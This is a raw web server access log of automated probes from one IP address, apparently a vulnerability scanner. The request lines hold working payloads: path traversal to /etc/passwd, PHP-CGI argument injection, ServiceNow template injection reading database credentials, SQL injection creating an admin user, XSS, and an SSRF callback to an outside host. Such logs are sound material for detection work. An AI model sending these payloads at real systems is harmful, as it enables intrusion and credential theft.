[24/Apr/2025:11:52:49 -0400] "POST /html/ad/adfilestorage/request/checkAcesso.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:53:34 -0400] "PUT /api/v2/simulation HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:53:40 -0400] "POST /webtools/control/view/StatsSinceStart HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:54:36 -0400] "GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20" 154.84.62.234 - - [24/Apr/2025:11:54:54 -0400] "GET /~projects HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:55:47 -0400] "GET /players.json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:55:58 -0400] "GET /asispanel/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:56:32 -0400] "POST /c/router HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:32 -0400] "POST /c/router HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:33 -0400] "POST /api/v2/templates/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:36 -0400] "POST /api/v2/observables/extended HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:11:56:40 -0400] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:11:56:43 -0400] "POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:45 -0400] "POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:56:46 -0400] "POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0" 154.84.62.234 - - [24/Apr/2025:11:57:00 -0400] "POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:57:00 -0400] "POST /drag/onlDragDatasetHead/getTotalData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:11:57:38 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:11:57:37 -0400] "GET /-/media/doo-doo.ashx HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:58:01 -0400] "POST /cgi-bin/skk_get.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:58:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 154.84.62.234 - - [24/Apr/2025:11:58:33 -0400] "POST /php/components/logs.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:11:59:08 -0400] "GET /login.do?jvar_page_title=<style><j:jelly%20xmlns:j=\"jelly\"%20xmlns:g=%27glide%27><g:evaluate>gs.addErrorMessage(1337*1337);</g:evaluate></j:jelly></style> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:11:59:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:59:21 -0400] "POST /add_reference_to_local_model HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:11:59:21 -0400] "POST /NmAPI/RecurringReport HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:11:59:57 -0400] "GET /file=http://oast.pro/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:00:10 -0400] "POST /index.php?rest_route=/wqc/v1/query HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:00:38 -0400] "POST /v1/api HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" 154.84.62.234 - - [24/Apr/2025:12:01:01 -0400] "POST /postlocal HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:03 -0400] "POST /boafrm/formSysCmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:12:01:10 -0400] "GET /v2m14F.txt?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:01:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:12:01:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:12:01:41 -0400] "GET /Synchronization HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - {{username}} [24/Apr/2025:12:01:47 -0400] "PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1" 200 118986 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.153183" 154.84.62.234 - - [24/Apr/2025:12:02:35 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:12:02:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:12:03:01 -0400] "GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:12:03:06 -0400] "GET /login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:03:17 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:03:28 -0400] "GET /ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:03:33 -0400] "GET /ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:04:03 -0400] "GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:04:33 -0400] "GET /cgi-bin/sslvpnclient?launchplatform HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:05:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:12:05:37 -0400] "GET /workflow/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:05:46 -0400] "GET /workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%272w9rfa96ik4o8oqgdmehoaclse2%27%2C+NULL%2C+%27AE6EC5D3CFB57690D240B4611C4DDD20%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2FirstName%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2LastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%272w9rfa96ik4o8oqgdmehoaclse2%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:12:05:49 -0400] "GET /workflow/jsp/logon.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.24" 154.84.62.234 - - [24/Apr/2025:12:06:01 -0400] "POST /device/description_en.html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.3.25" 154.84.62.234 - - [24/Apr/2025:12:06:01 -0400] "GET /settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:06:06 -0400] "POST /settings HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:06:11 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:12:06:26 -0400] "GET //juis_boxinfo.xml HTTP/1.1" 200 118692 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:12:06:27 -0400] "GET /?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:12:07:05 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:27 -0400] "GET /service-worker.js?local_access_token=2w9rfR2QrMwuCdDa8Ro4ebk0Rec HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:12:07:29 -0400] "PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:12:07:30 -0400] "GET /?--configPath=/nuclei_test/5294673340 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:07:53 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:07:58 -0400] "GET /admin/compass?download=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:18 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:19 -0400] "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:12:08:22 -0400] "POST /Synchronization HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.63" 154.84.62.234 - - [24/Apr/2025:12:08:33 -0400] "GET /nifi-api/flow/process-groups/root HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:08:33 -0400] "GET /nifi-api/controller/config HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6" 154.84.62.234 - - [24/Apr/2025:12:08:36 -0400] "GET /users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:08:41 -0400] "GET /users;. HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:42 -0400] "GET /admin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 154.84.62.234 - - [24/Apr/2025:12:08:49 -0400] "GET /admin/compass?del=PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPi5sb2c= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:08:53 -0400] "GET /admin/compass?logs=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:12:09:27 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:12:09:53 -0400] "POST /cgi/getGDPRParm HTTP/1.1" 200 0 "http://tplinkwifi.net" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:10:01 -0400] "POST /cgi/getParm HTTP/1.1" 200 0 "http://tplinkwifi.net" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:10:26 -0400] "GET /toolbox-resource/../serverconfig.xml HTTP/1.1" 200 118913 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.18" 154.84.62.234 - - [24/Apr/2025:12:10:30 -0400] "GET /RST_status.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - - [24/Apr/2025:12:10:33 -0400] "GET /RST_status.htm?x=1.gif HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:12:11:09 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:11:33 -0400] "POST /api/v0/train HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:12:11:45 -0400] "GET /wp-json/wp/v2/give_forms/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:11:48 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:12:12:38 -0400] "GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:12:12:38 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:13:26 -0400] "GET /TS/export/pagedefinition?ID=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:13:34 -0400] "GET /?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(6)))a) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:14:07 -0400] "POST /models/apply HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:12:14:19 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:14:41 -0400] "GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:12:15:02 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:12:15:38 -0400] "POST /chat/completions HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:12:16:00 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:12:16:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - 